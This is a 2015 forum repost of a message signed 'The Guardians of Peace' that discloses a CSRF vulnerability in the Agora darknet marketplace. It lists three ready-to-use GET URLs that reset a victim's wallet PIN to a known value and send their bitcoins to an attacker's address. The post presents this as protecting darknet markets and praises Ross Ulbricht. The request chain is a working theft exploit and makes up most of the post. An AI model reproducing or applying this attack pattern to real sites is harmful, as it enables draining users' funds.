Aerosol Posted February 19, 2015 Report Posted February 19, 2015 Ladies and gentlemenBoys and girlsIt come to our attention that a brave warrior for the people RossWilliam Ulbricht was unlawfully convicted by the corporation known asthe American government. This mockery of justice has not gone unnoticed. In order to protect the next generation of darknet markets we will bedisclosing vulnerabilities for these sites in order to make thesesites safer from attack. To start, the Agora Marketplace contains a CSRF vulnerability whichcan be used to drain a victim account of all of their Bitcoins. Thefollowing URLs can be used to perform this attack:URL to start PIN reset:http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=URL to change current PIN:http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=SaveURL to send bitcoins using the new pin:http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=SendThese are all GET requests and don't require JavaScript to work.NoScript cannot save you from poor coding practices.There will be more to come. Stay safe. Stay anonymous.-The Guardians of PeaceSource Quote
